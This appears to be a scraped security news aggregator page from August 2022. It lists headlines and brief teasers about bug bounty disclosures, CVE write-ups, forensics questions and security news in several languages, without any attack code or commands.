    Nyan Cat GIFs
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Kudos and Recognition
    During my time in the industry, I've seen a couple of interesting aspects of "information sharing". One is that not many like to do it. The other is that, over time, content creation and consumption has changed pretty dramatically. Back in the day, folks like Chris Pogue, with his The Digital Standard blog, and Corey Harrell with his Journey Into IR blog, and even more recently, Mari with her Another Forensics Blog have all provided a great deal of relevant, well-developed information. A lot of what Mari shared as far back as 2015 has even been relevant very recently, particularly regarding deleted data in SQLite databases. And, puh-LEASE, let's not forget Jolanta Thomassen, who, in 2008, published her dissertation addressing unallocated space in Registry hives, along with the first tool (…

  • Open

    EtwSessionHijacking: Blocking Procmon from monitoring network events
    submitted by /u/sanitybit [link] [comments]
    Stripping nthLink VPN encryption
    submitted by /u/yarmak [link] [comments]
    Attack surface of browser extension pages
    submitted by /u/sanitybit [link] [comments]
    Exploitation in the era of formal verification - a peek at a new frontier
    submitted by /u/lojump1 [link] [comments]
    Twitter Whistleblower Document Archive
    submitted by /u/sanitybit [link] [comments]
    Cherrybomb: OAS file auditor and API scanner just released version v0.7.0! would love input for more scans to implement
    submitted by /u/RazCherrybomb [link] [comments]
    Misconfigured Resource-Based Policies - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
  • Open

    Chaining Telegram bugs to steal session-related files.
    We will discuss the chaining of two bugs on the telegram android application, which can make malicious applications steal internal… Continue reading on Medium »
    Server Side Template Injections Portswiggers Labs Walkthrough.
    Hi my name is Hashar Mujahid. Today we are going to solve some labs regarding server-side template Injections. Continue reading on InfoSec Write-ups »
    Could GitHub Copilot produce a vulnerable code?
    GitHub Copilot is an interesting solution that promises to simplify the developer’s day-to-day tasks. Continue reading on Medium »
    Break the Logic: Insecure Parameters (€300)
    Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same… Continue reading on InfoSec Write-ups »
    Break the Logic: Insecure Parameters (€300)
    Hello everyone. Today, I’m going to talk about two minor vulnerabilities based on insecure parameters that I discovered in the same… Continue reading on Medium »
  • Open

    Detego Forensics product experience
    If you have had experience with Detego Forensics experience, how does it compare to others similar products you have used? submitted by /u/VLTmike801 [link] [comments]
    Elcomsoft IOS Agent
    I have a iPhone 7 running 15.0.2 which is supported by Elcomsoft IOS Forensic tool kit, I go through the steps of paid developer apple account, In the Process in trying to install the Agent, I will put in the developer account and then the app password it will say device detected and then give me information about my device and then it will read “the requested backup could not be found " any ideas on how to get around this? ​ the phone is in airplane mode but connected to WIFI, have tried different ports and different computers and cables, tried rebooting and then uninstalling and reinstalling, disabled my security then reinstalled, doing all that and then still getting the same error, any Help? submitted by /u/dougman2082 [link] [comments]
    What would be the proper way to acquire a raw disk dump from an iPhone 3GS on iOS 6.1.6?
    I got this phone that I would like to use to practice. I'm absolutely new to all this, the closest I've been is imaging old HDDs from vintage computers and recovering interesting (non-personal) files and software. And that's what I would like to try on mobile phones too. Googling for th3 3GS specifically led me to a paper and then to a book by Jonathan Zdziarski which I think laid down the foundations pretty well. But that was in 2009 and now things are different I suppose. From what I gathered I have the iTunes option, which I think I should do first. But that won't let me dig at a lower level, in order to recover or peek at what was potentially deleted. There's a RAM disk method, which I have no idea if it's still up to date (the materials I read only go up to iOS 3x) and honestly haven't looked deeper. And the jailbreaking tools p0sixspwn and redsn0w. I think these would be the easiest and the most logical approach but looking at what packages they install I'm not sure if they do it in the system partition or in the user partition. What of these would be the best, in a proper forensics acquisition matter? Since this iOS version has encryption schemes, does it make any sense to carve the unused space? Since this is just for personal use, I'd prefer to stay with free or trial versions of software. I also am limited to Windows XP/Vista as these are my legacy "workstations" where I already do some raw imaging (optical media and a couple of magnetics but these have "click next, next, ok" UIs, so not that technical). submitted by /u/dismalwasteland [link] [comments]
  • Open

    NordVPN Linux Client - Unsafe service file permissions leads to Local Privilege Escalation
    Nord Security disclosed a bug submitted by bashketchum: https://hackerone.com/reports/1218523 - Bounty: $700
    Reflected XSS on pages.email.sel.sony.com/page.aspx via jobid parameter
    Sony disclosed a bug submitted by leo_rac: https://hackerone.com/reports/1309949
    Golang expvar Information Disclosure
    Uber disclosed a bug submitted by mustafa_farrag: https://hackerone.com/reports/1650035 - Bounty: $500
    Off-by-slash vulnerability in nodejs.org and iojs.org
    Node.js disclosed a bug submitted by nagaro: https://hackerone.com/reports/1631350
    support.invisionpower.com takeover the subdomain with Zendesk
    Invision Power Services, Inc. disclosed a bug submitted by fthacker101: https://hackerone.com/reports/1646554
  • Open

    Hunting for emerging command-and-control frameworks
    submitted by /u/SCI_Rusher [link] [comments]
    Join a Red Team?
    All, Not sure if this is the right place for this but I was reaching out as I am continuing on my journey to pivot to Pen Testing, I'm looking to get together with a group to grow and learn with! ​ Does anyone have a team their looking to add another new person onto? Doesn't need to be anything serious but even a social group that meets to do bug bounties, RE, etc. would be awesome! submitted by /u/schemaadmin [link] [comments]
    Windows PrivEsc — Hijacking DLLs
    submitted by /u/Clement_Tino [link] [comments]
    🔥 RPCMon: A new tool based on Event Tracing for Windows to monitor RPC calls 🔥
    submitted by /u/kubiscan [link] [comments]
  • Open

    SecWiki News 2022-08-24 Review
    2021 攻击技术发展趋势报告全文 by ourren 某农信企业自主创新自动化安全基线检测平台建设实践 by ourren IJTCS-FAW 2022 机器学习与形式化方法分论坛精彩回顾 by ourren 利用 PHP-FPM 做内存马的方法 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-24 Review
    2021 攻击技术发展趋势报告全文 by ourren 某农信企业自主创新自动化安全基线检测平台建设实践 by ourren IJTCS-FAW 2022 机器学习与形式化方法分论坛精彩回顾 by ourren 利用 PHP-FPM 做内存马的方法 by ourren 更多最新文章,请访问SecWiki
  • Open

    MSF — Injeção de Payload de Executável
    O módulo peinector injeta uma carga útil dentro de um executável do Windows, permitindo que a conexão reversa seja estabelecida assim que… Continue reading on 100security »
    Sua empresa está preparada para um Deepfake?
    Eu sei, esse título pode ser um pouco chamativo e até mesmo soar irreal, mas não estamos distantes dessa realidade, e vou te mostrar o… Continue reading on Medium »
    Top 3 HACKING Operating Systems + BONUS TIP
    In my opinion an operating system is just a tool. The tool has to help me to achieve my goals in the most efficient way possible. I have… Continue reading on Medium »
  • Open

    挖矿木马开始启用 Tox 作为 C&C 新方法
    此前也发现过 Tox 被攻击者用于进行通信,近日 Uptycs 威胁研究团队又发现了使用 Tox 协议的 ELF 样本文件。
    FreeBuf早报 | 美国拟立法禁止采购有漏洞软件;微软披露ChromeOS 漏洞细节
    软件供应商应保证“提交软件物料清单中列出的所有项目,均不存在影响最终产品或服务安全性的已知漏洞或缺陷,并给出证明。
    2022CCS大会议题前瞻 | CCS&斗象科技 - 金融安全分论坛
    斗象科技与无糖信息承办CCS大会的重磅分论坛之一【金融安全分论坛】,为大家带来了6个金融安全议题。金融科技,安全赋能!
    推特前安全主管控诉存在 "令人震惊"的安全漏洞
    Zatko控诉推特在安全实践中存在“令人震惊的”漏洞,在安全、隐私和内容审核方面存在“严重缺陷”。
    GitLab修复了CE、EE版本中一个远程代码执行漏洞
    DevOps 平台 GitLab 修复了其社区版(CE)和企业版(EE)中出现的一个关键远程代码执行漏洞。
    滥用SaaS平台的网络钓鱼攻击暴涨11倍
    数据显示,从 2021 年 6 月到 2022 年 6 月,这种滥用行为大幅增加了 1100%。
    疑似APT组织针对土耳其海军发起钓鱼攻击
    攻击者通过将文档加密诱骗受害者启用宏脚本,启用宏后文档中的内容将被解密并运行恶意vba代码。
  • Open

    Break the Logic: Insecure Parameters (€300)
    No content preview
    Write-up: Upload Vulnerabilities @ TryHackMe
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and version…
    No content preview
  • Open

    Break the Logic: Insecure Parameters (€300)
    No content preview
    Write-up: Upload Vulnerabilities @ TryHackMe
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and version…
    No content preview
  • Open

    Break the Logic: Insecure Parameters (€300)
    No content preview
    Write-up: Upload Vulnerabilities @ TryHackMe
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and version…
    No content preview
  • Open

    Drones & OSINT: What Flies Ahead
    We know about the OSINT tools and techniques for boats, planes and trains, but what about drones? This blog aims to fill that gap. Continue reading on Medium »
    Metodologi Hacker (indon
    Metodologi Hacker adalah langkah demi langkah atau fase yang dilakukan peretas secara berurutan. kita semua mungkin berpikir bahwa hacking… Continue reading on Medium »
  • Open

    Microsoft details critical vulnerability in ChromeOS
    Article URL: https://www.theregister.com/2022/08/23/microsoft_chromeos_bug/ Comments URL: https://news.ycombinator.com/item?id=32576355 Points: 1 # Comments: 0
  • Open

    Python for Data Analytics VS Python for Machine Learning (for cyber security)
    If I wanted to advanced my Python skillset, which direction do you think would be more useful/practical. Python for Data Analytics (I guess you can parse logs files better maybe)... Or Python for Machine Learning (customizing your IDS maybe)... What do you think? submitted by /u/extremexample [link] [comments]

  • Open

    BBOT — Bighuge BLS OSINT Tool
    BBOT é um framework OSINT recursivo e modular escrito em Python. Ele é capaz de executar todo o processo OSINT em um único comando… Continue reading on 100security »
    Powershell POC for CVE-2022–26923
    Since you are here I assume that you already know what CVE-2022–26923 is all about. Continue reading on Medium »
    You should learn THIS before HACKING
    Hacking, Penetration Testing and Red Teaming is a broad field and requires huge amounts of skills in order to succeed. Continue reading on Medium »
  • Open

    BBOT — Bighuge BLS OSINT Tool
    BBOT é um framework OSINT recursivo e modular escrito em Python. Ele é capaz de executar todo o processo OSINT em um único comando… Continue reading on 100security »
    Simple OSINT to Find Account in Several Social Media by Username
    OSINT (“Open Source” dan “Intelligence”) merupakan tools untuk membantu dalam proses information gathering. Continue reading on Medium »
  • Open

    Software, Converters, Games, ETC
    https://down10.software/qp/data/ So much more that I put in the title. Enjoy :) XOXO submitted by /u/ManaHoney504 [link] [comments]
  • Open

    But You Told Me You Were Safe: Attacking the Mozilla Firefox Renderer (Part 2)
    submitted by /u/sanitybit [link] [comments]
    bomber - a vulnerability scanner for SBOMs
    submitted by /u/sanitybit [link] [comments]
    Chainsaw 2.0: Allows users to rapidly search through Windows event logs and hunt for threats using Sigma detection rules.
    submitted by /u/sanitybit [link] [comments]
    SBOM 101 - All the questions you were afraid to ask Software Bill of Materials
    submitted by /u/MiguelHzBz [link] [comments]
    Argument Injection in Visual Studio Code < 1.67.1 (CVE-2022-30129)
    submitted by /u/monoimpact [link] [comments]
    [CVE-2020-2733] Technical overview and PoC of bypassing admin authentication of JD Edwards EnterpriseOne
    submitted by /u/vah_13 [link] [comments]
    CVE-2022-22715 PoC: Windows Dirty Pipe
    submitted by /u/sanitybit [link] [comments]
    Masky is a python library providing an alternative way to remotely dump domain users’ credentials
    submitted by /u/sanitybit [link] [comments]
  • Open

    Making small things BIG
    Hacking Salesforce sites. Continue reading on Medium »
    What Is Session Fixation
    Session fixation is a web attack technique. The attacker tricks the user into using a specific session ID. After the user logs in to the… Continue reading on Medium »
    Session Hijacking
    Session hijacking is defined as taking over an active TCP/IP communication session without the user’s permission. When implemented… Continue reading on Medium »
    Broken Access Control
    Broken Access Control vulnerabilities are common in modern applications since the design and implementation of access control mechanisms… Continue reading on System Weakness »
    Finding Hidden Gems with Nuclei Templates!
    Lately, I have been thinking about automation. Continue reading on Medium »
    Hack The Pentagon — Command Injection (via CVE-2019–11510 and CVE-2019–11539)
    The Exploit Continue reading on Medium »
    Cool Recon techniques every hacker misses!
    Welcome to this article! This article is about some cool recon techniques every hacker misses! Tighten your belts as we walk you through… Continue reading on Medium »
  • Open

    DirtyCred' Vulnerability Haunting Linux Kernel for 8 Years
    Article URL: https://www.securityweek.com/dirtycred-vulnerability-haunting-linux-kernel-8-years Comments URL: https://news.ycombinator.com/item?id=32570059 Points: 2 # Comments: 0
  • Open

    XSS and HTML Injection on the pressable.com search box
    Automattic disclosed a bug submitted by sawrav-chowdhury: https://hackerone.com/reports/1537149 - Bounty: $250
  • Open

    VA on Kubernet cluster and pods
    Hi, So I have a client who hosts services on kube. I want to do a VA on those services/cluster. From the documentation of nessus I see that I'll have to install container first to run a nessus scan on those kube services. Any idea how I can proceed? I am surely a bit confused and would appreciate all the help I can get. Will remove this post if id doesn't match the guidelines. submitted by /u/light_striker12 [link] [comments]
  • Open

    SecWiki News 2022-08-23 Review
    美国国防工业网络保护框架和启示 by ourren Celer Network cBridge 跨链桥事故真相:BGP 劫持 by ourren 从攻击者视角聊聊K8S集群安全(上) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-23 Review
    美国国防工业网络保护框架和启示 by ourren Celer Network cBridge 跨链桥事故真相:BGP 劫持 by ourren 从攻击者视角聊聊K8S集群安全(上) by ourren 更多最新文章,请访问SecWiki
  • Open

    Legitimate SaaS Platforms Being Used to Host Phishing Attacks
    Platform-abuse phishing is on the rise. We analyze how attackers use services such as website builders to host phishing pages. The post Legitimate SaaS Platforms Being Used to Host Phishing Attacks appeared first on Unit 42.
  • Open

    攻防复盘星空夜话 | FreeBuf网安智库说第四季今日正式上线
    今年的攻防演练余温未尽,FreeBuf网安智库说第四季已经发车。
    peetch:一个针对eBPF的安全实践研究平台
    peetch平台由多种工具组成,旨在帮助广大研究人员通过各种方式绕过TLS协议保护功能,并以此来研究和分析eBPF的安全性。
    因用户未更新固件,超八万台摄像机可能被利用
    安全研究人员发现超过八万台摄像机尚未更新固件,容易受到关键命令注入漏洞的影响。
    黑客利用零日漏洞窃取 General Bytes ATM 机上的加密货币
    据 The Hacker News 网站披露,比特币 ATM 机制造商 General Bytes 证实其遭到了网络攻击。
    FreeBuf早报 | 黑客针对比特币的 ATM 制造商; 汽车经销商遭受重大勒索软件攻击
    被称为“神秘团队”的威胁参与者使用 Raven Storm 工具对多个目标进行分布式拒绝服务 (DDoS) 攻击。
    BlackStone:一款功能强大的渗透测试报告工具
    该工具允许我们在数据库中提交和存储渗透测试过程中发现的漏洞,并通过内部和外部审计来对漏洞进行分类。
  • Open

    Cloud stored files in iOS using Cellebrite
    I’ve been trying to research this but resources on cloud forensics have been difficult to find. Is it possible to retrieve files stored on iCloud (photos, keychain data, etc) through using a Cellebrite advanced logical/file system extraction methods or would these files not appear through these kind of extractions and would thus need the use of a cloud extraction approach? submitted by /u/holidaykid09 [link] [comments]
  • Open

    ‍$5000 Bounty, Free Certification Courses, IndexDB, Reconnaissance Guide, Elasticsearch, and…
    No content preview
  • Open

    ‍$5000 Bounty, Free Certification Courses, IndexDB, Reconnaissance Guide, Elasticsearch, and…
    No content preview
  • Open

    ‍$5000 Bounty, Free Certification Courses, IndexDB, Reconnaissance Guide, Elasticsearch, and…
    No content preview
  • Open

    Celer Network cBridge 跨链桥事故真相:BGP 劫持
    作者:Thinking & 爱上平顶山@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/SInU_o3Ct-7A6pFbKLqzHQ 事件背景 8 月 18 日,Celer Network 官方表示,北京时间 8 月 18 日 3:45 至 6:00 期间,部分使用 cBridge 的用户被引导至恶意智能合约,cBridge 前端界面疑似遭受 DNS H...
  • Open

    Celer Network cBridge 跨链桥事故真相:BGP 劫持
    作者:Thinking & 爱上平顶山@慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/SInU_o3Ct-7A6pFbKLqzHQ 事件背景 8 月 18 日,Celer Network 官方表示,北京时间 8 月 18 日 3:45 至 6:00 期间,部分使用 cBridge 的用户被引导至恶意智能合约,cBridge 前端界面疑似遭受 DNS H...

  • Open

    Information Security Checklist for Small to Medium Organizations
    submitted by /u/InformationSecurity [link] [comments]
    kyber-py: A pure python implementation of CRYSTALS-Kyber
    submitted by /u/sanitybit [link] [comments]
    Patch bypass for [CVE-2020-6369] Hard-coded Credentials in CA Introscope Enterprise Manager
    submitted by /u/vah_13 [link] [comments]
    Vulnerability in the enforcement of group permissions in Linux containers (Docker, Kubernetes, etc.)
    submitted by /u/sjmurdoch [link] [comments]
    “Useless” path traversals in Zyxel admin interface (CVE-2022-2030)
    submitted by /u/0xdea [link] [comments]
    Ridiculous vulnerability disclosure process with CrowdStrike Falcon Sensor
    submitted by /u/Ex1v0r [link] [comments]
    Trivy: Enhanced with AWS scan integration
    submitted by /u/Rewanth_Tammana [link] [comments]
    GitHub Cache Poisoning
    submitted by /u/BarakScribe [link] [comments]
  • Open

    API pentest requirements?
    I found an interesting article here and have a few questions. https://www.getsecureworld.com/blog/what-are-the-api-pentest-requirements/ I understand that user credentials are required per profile to test vulnerabilities related to broken access controls. But what about an API dataset? Here is the info taken from that site. ​ An API dataset Now, what if the documentation does not exist and you need to perform an API pentest. In this situation, you will need to give as much dataset about the API communication as possible. A dataset is simply a history group of requests and responses between the developers and your API. This could be retrieved from the test phase of your API. The request should include all the needed parameters with their values, and all the required authentication cookies and tokens. In addition, you should include at least one valid response for each request. The more API dataset you give to your service provider, the more tests he would perform, and of course, the more likely to find vulnerabilities. However, offering the API documentation stay the best solution for better results. Here is an example of such dataset: Message type Example Request GET http://example.com:8090/tpmRest/v1/participants/participant?isHost=false&name=partner1&isActive=true Response Successful operation response:{“result”:”Operate successfully”}Failed operation response:{“errorMessage”:”XXXXXX”} What is the common practice when do you perform API pentest? Do you get an API dataset during initial meeting with your client? The reason I'm asking this is I found a bunch of articles and tutorials about API enumeration. e.g. API recon tutorials https://portswigger.net/support/using-burp-to-enumerate-a-rest-api https://www.redteamsecure.com/research/api-enumeration-with-redteam-securitys-tool-purl https://www.youtube.com/watch?v=fvcKwUS4PTE So, if we already have this API dataset, API enumeration is no longer required right? submitted by /u/w0lfcat [link] [comments]
    Hacking Kioptrix Series (1-5) Vulnerable Machines from Vulnhub
    https://www.youtube.com/watch?v=WqqMDbWnQ70&list=PL0UJtYdHHM47v5ZboMZX1fp_mVz4EWqDQ submitted by /u/sunset_bytes [link] [comments]
  • Open

    Vulnerability in the enforcement of group permissions in Linux containers
    Article URL: https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/# Comments URL: https://news.ycombinator.com/item?id=32557737 Points: 4 # Comments: 1
    Vulnerability in the enforcement of group permissions in Linux containers
    Article URL: https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/ Comments URL: https://news.ycombinator.com/item?id=32554741 Points: 3 # Comments: 0
    A ChromeOS remote memory corruption vulnerability
    Article URL: https://www.microsoft.com/security/blog/2022/08/19/uncovering-a-chromeos-remote-memory-corruption-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32551169 Points: 1 # Comments: 0
    Ridiculous vulnerability disclosure process with CrowdStrike Falcon Sensor
    Article URL: https://www.modzero.com/modlog/archives/2022/08/22/ridiculous_vulnerability_disclosure_process_with_crowdstrike_falcon_sensor/index.html Comments URL: https://news.ycombinator.com/item?id=32548671 Points: 299 # Comments: 150
  • Open

    How do I determine the cause of strange IPFS NFT Storage URL traffic?
    Disclaimer: am baby tech. I am seeing consistent traffic to IPFS NFT storage urls on my company network. The events occur on three computers simultaneously. The computers are all "owned" by the same user. The traffic occurs after hours, as well. I've checked for IPFS software, IPFS companion extension, unmineable sw, miners, Phoenix, etc. I've checked through the user's python code for anything sus. Can't find anything. I'm not sure what else to check, but this behavior doesn't seem normal to me. It seems like potential C2 traffic but I'm unsure how because it's just to NFT links? Has anyone come across this before? Thanks for the help ❤️ submitted by /u/BigTiddyIncelBF [link] [comments]
    How to perform passive recon by company title.
    Hello folks, I'm curious if someone can share any advice/articles/guides on how to perform passive recon by company title. Any mentions, images, files, titles, or logos that have anything to do with the name of the company. Thank you in advance. submitted by /u/TRYH0 [link] [comments]
    Sample firewall/SIEM logs
    I need to do couple of assignments to analyze some sample firewall/SIEM logs for any signs of intrusions/threats. Are there any resources where I can find realistic logs to do this type of analysis? submitted by /u/palm_snow [link] [comments]
  • Open

    Repeatability
    My understanding is that forensic analysis has to be repeatable to be deemed reliable. To this I ask, are screenshots admissible as forensic evidence? Especially if the process of collecting them is non-repeatable. For example, phone is seized and during manual review, screenshots are taken, or in fact pictures of the screen to show messages. Subsequently to this, the phone is not disconnected from the internet and messages are wiped from the device remotely. During a forensic download, these messages are now unable to be recovered. Would this evidence be inadmissible? submitted by /u/Clear-Alternative-57 [link] [comments]
    Outlook - Read access to another persons email.
    Hi. I'm trying to see if there is a local file on a users computer that can tell me if that user has read access to another person's email. Does anyone know if this type of file exist in O365? submitted by /u/antmar9041 [link] [comments]
    PDF File Forensics | TryHackMe Confidential
    submitted by /u/MotasemHa [link] [comments]
    NTFS Data Runs
    Hello, I'm trying to manually parse some data runs from an NTFS file system to recover a document. Is there a tool that would allow me to put the data run into it and have it parse the data run so I can save tons of time doing it by hand? Respectfully submitted by /u/Mazren79 [link] [comments]
  • Open

    How a Port scan got me Nokia Hall of Fame
    Hi everyone. This is Mani Sashank, a security analyst who does bug bounty in his free time. 😄 Continue reading on Medium »
    How to: Breaching Cardholder Data in 50 hours
    Ever wondered how one can breach an organization’s network? In this article I talk about the steps I took to compromise a CDE environment. Continue reading on Medium »
    White Hat
    Bug bounty programs benefit companies by making use of ethical hackers who uncover bugs in their codes. When hackers discover… Continue reading on Medium »
    SSRF & Google HOF(Hall of Fame)
    This time I will talk about a very interesting SSRF(Server Side Request Forgery) on a Google asset and interesting because the way I found… Continue reading on Medium »
    Crimson — AppSec firearm III
    Guidelines for the crimson_exploit module usage. Continue reading on Medium »
    Stabilizing Netcat Shell
    The Basic Netcat shell has some limitations like we cannot use “Up arrow/Down arrow” to scroll through previous commands, cannot use the… Continue reading on Medium »
    How I found Login Credentials on PDF File
    Tool: Continue reading on Medium »
    How I found FTP Credentials in .DOCX file
    Tools: Continue reading on Medium »
    How I Found SQL Injection in 2 Day
    Tools: Continue reading on Medium »
  • Open

    How to OSINT Russia? (even if you don’t speak Russian) Part 3— Telegram
    The swiss knife of Russian OSINT and weapon of choice for cyrillic communication. Got a lot of bad reputation in the last few years… Continue reading on Medium »
  • Open

    How to: Breaching Cardholder Data in 50 hours
    Ever wondered how one can breach an organization’s network? In this article I talk about the steps I took to compromise a CDE environment. Continue reading on Medium »
    CRTO Review
    TLDR; Continue reading on Medium »
    5 Tips to ADVANCE your HACKING skills
    If you want to become a penetration tester or Red Teamer, then you need to have strong hacking skills. Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-22 Review
    SecWiki周刊(第442期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-22 Review
    SecWiki周刊(第442期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Hugo to Jekyll
    정말 설마설마 했습니다. 아니 이런 일은 없을거라고 장담했습니다. 작년에 Jekyll에서 Hugo로 전환한지 딱 1년만에 마음이 바뀌었습니다. 다시 Jekyll로 돌아갑니다. Why Hugo! 정말 빠르고 좋습니다. Jekyll을 사용했던 당시 가장 큰 문제였던 빌드 속도 이슈를 한번에 해결했어요. 그리고 1년 후 다시 Jekyll로 가려는 가장 큰 이유는 아이러니하게도 시간이 문제입니다. Build 시간 자체는 당연히 Hugo가 훨씬 빠르지만 글을 쓰는데 있어서 편했던건 Hugo에서 사용하는 Go template보단 Jekyll의 Liquid 문법이였던 것 같습니다. 이는 글 작성에만 해당되는건 아니에요. 블로그를 커스터마이즈하고 기능을 만들 때 마다 Jekyll은 Liquid와 Plugin(gem)으로 쉽게 해결할 수 있는 방면, Hugo의 경우 직접 Template 코드를 이용해 만들어야 하기 때문에 결국 이를 관리하기 위한 시간들이 점점 들어가기 시작했습니다. 그리고 마지막으로 제가 개인적으로 블로그 운영 방식 자체를 변화하려고 하다 보니 곧 이게 방아쇠가 되었네요. 여기서 운영 방식의 변화는 낮은 퀄리티의 글 수를 줄이고 유사한 컨텐츠는 Merge 하는 방식입니다. How Jekyll to Hugo 떄와 동일하게 Ruby script로 migration 했습니다. 덤으로 blogger, jekyll, hugo를 넘나들며 망가져버린 time 포맷을 한번에 정리했네요. require 'yaml' require 'time' prefix = "./content/post/" Dir.entries(prefix).each do | name | if name.strip != "." && name != ".." begin count = 0 head = "" body = "" File.readlines(prefix+name).each do |line| if count < 2 head = head + line else body = body + line...
  • Open

    Portswigger Labs, how to get the most out of it
    or why looking up the solution underneath the lab isn’t cheating, it’s part of learning Continue reading on InfoSec Write-ups »
    Create a simple phishing website and a Javascript keylogger
    No content preview
    First Bug Bounty from DOS: Taking the service down
    No content preview
    Account takeover worth $1000
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and versio
    No content preview
  • Open

    Portswigger Labs, how to get the most out of it
    or why looking up the solution underneath the lab isn’t cheating, it’s part of learning Continue reading on InfoSec Write-ups »
    Create a simple phishing website and a Javascript keylogger
    No content preview
    First Bug Bounty from DOS: Taking the service down
    No content preview
    Account takeover worth $1000
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and versio
    No content preview
  • Open

    Portswigger Labs, how to get the most out of it
    or why looking up the solution underneath the lab isn’t cheating, it’s part of learning Continue reading on InfoSec Write-ups »
    Create a simple phishing website and a Javascript keylogger
    No content preview
    First Bug Bounty from DOS: Taking the service down
    No content preview
    Account takeover worth $1000
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection attack, querying the database type and versio
    No content preview
  • Open

    FreeBuf早报 | 谷歌曝光有史以来最大DDoS攻击;一根USB线就能偷走韩系车
    近段时间,美国的TikTok和YouTube上兴起了一种所谓的“起亚挑战”,一些现代或起亚的车型只需要一根USB线就可以成功启动。
    攻防经验和能力如何沉淀到日常安全防护?| FreeBuf甲方社群直播回顾
    15天的攻防演练落幕,红蓝双方经历一场大考。8月18日,第八期FreeBuf甲方社群直播组织了「攻防复盘,星空夜话」,邀请红蓝方知名专家交流攻防演练实战经验。本期直播由公安部第三研究所研究员樊苑担任主持人,蓝方代表某企业安全架构师李宗晖、某国际自动化厂商网络安全服务团队负责人剑思庭和红方代表斗象科技安服专家张贵卿、黄炜榆,从规则演变、0day利用到能力沉淀等五个角度探讨交流攻防经验。FreeBuf
    网络犯罪组织 TA558 针对酒店、宾馆和旅游机构展开攻击
    研究人员发现一个出于经济动机的网络犯罪集团,与针对拉丁美洲酒店和旅游组织的持续攻击浪潮有关。
    苹果曝严重安全漏洞,喜提热搜第一
    苹果公司发布了两份安全报告,承认公司的智能手机iPhone、平板电脑iPad和iMac电脑等产品存在严重的安全漏洞。
    DEF CON大会:白帽黑客演示远程控制退役卫星
    白帽黑客组织Shadytel现场演示远程劫持一颗退役卫星,并利用它来播放著名黑客电影《战争游戏》。
    FreeBuf早报 | 非核酸结果阳性属于个人敏感信息;iPhone、iMac存在严重安全漏洞
    全球动态1.苹果安全漏洞登上热搜第一,涉及iPhone、iMac等据美联社20日报道,美国苹果公司当地时间17日发布两份安全报告,两份报告披露,公司旗下智能手机iPhone、平板电脑iPad和iMac电脑等产品存在严重安全漏洞。这些漏洞可能会让潜在的攻击者入侵用户设备、获得管理权限甚至完全控制设备并运行其中的应用软件。[阅读原文]2.越南更新网络安全法,要求公司数据存储本地化越南信息和通信部本周更
  • Open

    Chrome 沙箱绕过研究
    作者: 启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/gqH0lqz1ey6IzT--UD9Jsg 01 研究背景 沙箱作为很多主流应用的安全架构的重要组成部分,将进程限制在一个有限的环境内,避免该进程对磁盘等系统资源进行直接访问。Chromium 中的沙箱进程通过pipe等方式和具有I/O等高权限的进程交互来完成进一步的操作,因此利用IPC绕过沙箱成为...
    从偶遇 Flarum 开始的 RCE 之旅
    原文链接:https://mp.weixin.qq.com/s/EqEyEDKpzxS5BYA_t74p9A 作者:Phith0n 事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何责任 一次日常测试中,偶然遇到了一个Flarum搭建的论坛,并获得了其管理员账号。本来到这里已经可以算完成了任务,将漏洞报...
  • Open

    Chrome 沙箱绕过研究
    作者: 启明星辰ADLab 原文链接:https://mp.weixin.qq.com/s/gqH0lqz1ey6IzT--UD9Jsg 01 研究背景 沙箱作为很多主流应用的安全架构的重要组成部分,将进程限制在一个有限的环境内,避免该进程对磁盘等系统资源进行直接访问。Chromium 中的沙箱进程通过pipe等方式和具有I/O等高权限的进程交互来完成进一步的操作,因此利用IPC绕过沙箱成为...
    从偶遇 Flarum 开始的 RCE 之旅
    原文链接:https://mp.weixin.qq.com/s/EqEyEDKpzxS5BYA_t74p9A 作者:Phith0n 事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何责任 一次日常测试中,偶然遇到了一个Flarum搭建的论坛,并获得了其管理员账号。本来到这里已经可以算完成了任务,将漏洞报...
  • Open

    Increased CVE Activity in Curl?
    Article URL: https://daniel.haxx.se/blog/2022/08/22/increased-cve-activity-in-curl/ Comments URL: https://news.ycombinator.com/item?id=32548359 Points: 69 # Comments: 10
  • Open

    Sqli + xss + html_injection at the same time.
    URL : Continue reading on Medium »

  • Open

    the Dabbler
    Over the years, work/career-wise, I’ve done a few things a lot and a lot of things a little bit, focused mostly on data, reporting, and… Continue reading on Medium »
    ‘Decision-making centers’ — The Russian response to Dugina’s killing
    Some Russian Telegram responses to the killing of the nationalist intellectual’s daughter. Continue reading on Medium »
    Find Subdomains
    I’ve spend half a day playing around with various tools that could get me a list of subdomains for a given domain. Here’s what I found. Continue reading on Medium »
    Way for quick deanon
    There is one legal trick that allows you to quickly set the IP, time zone and browser of the person you are looking for. If you need to… Continue reading on Medium »
    SPY NEWS: 2022 — Week 33
    Summary of the espionage-related news stories for the Week 33 (August 14–20) of 2022. Continue reading on Medium »
    Making a cyberdetective trap…
    Your mission, if you undertake it, is to identify various intruders who are too comfortable with Telegram. They have learned to register… Continue reading on Medium »
  • Open

    Certificates - Wildcard or no?
